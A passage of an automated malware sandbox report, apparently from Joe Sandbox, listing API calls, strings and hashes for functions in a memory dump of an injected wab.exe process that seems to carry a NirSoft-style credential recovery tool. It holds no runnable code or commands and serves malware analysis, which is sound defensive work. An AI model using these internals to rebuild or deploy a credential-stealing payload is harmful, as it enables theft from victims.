                                                                                                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                • memset.MSVCRT ref: 0040DA23
                                                                                                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                • String ID: caption
                                                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 00413972
                                                                                                                                                • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                • memset.MSVCRT ref: 004139B8
                                                                                                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                • memset.MSVCRT ref: 00413A00
                                                                                                                                                • memcpy.MSVCRT ref: 00413A1B
                                                                                                                                                • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                • String ID: \systemroot
                                                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy
                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                • API String ID: 1284135714-318151290
                                                                                                                                                • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 290601579-0
                                                                                                                                                • Opcode ID: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                • Opcode Fuzzy Hash: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memchrmemset
                                                                                                                                                • String ID: PD$PD
                                                                                                                                                • API String ID: 1581201632-2312785699
                                                                                                                                                • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2163313125-0
                                                                                                                                                • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@$wcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 239872665-3916222277
                                                                                                                                                • Opcode ID: f3663e8288db930de81c623903cc877f8ba593c01bc576138108ca37437480ac
                                                                                                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                • Opcode Fuzzy Hash: f3663e8288db930de81c623903cc877f8ba593c01bc576138108ca37437480ac
                                                                                                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                • String ID: %s (%s)$YV@
                                                                                                                                                • API String ID: 3979103747-598926743
                                                                                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                • API String ID: 2767993716-572158859
                                                                                                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                  • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                                                • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                • out of memory, xrefs: 0042F865
                                                                                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                • database is already attached, xrefs: 0042F721
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                • memcpy.MSVCRT ref: 0040EB80
                                                                                                                                                • memcpy.MSVCRT ref: 0040EB94
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                • String ID: ($d
                                                                                                                                                • API String ID: 1140211610-1915259565
                                                                                                                                                • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3015003838-0
                                                                                                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00407E44
                                                                                                                                                • memset.MSVCRT ref: 00407E5B
                                                                                                                                                • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 59245283-0
                                                                                                                                                • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3467550082-0
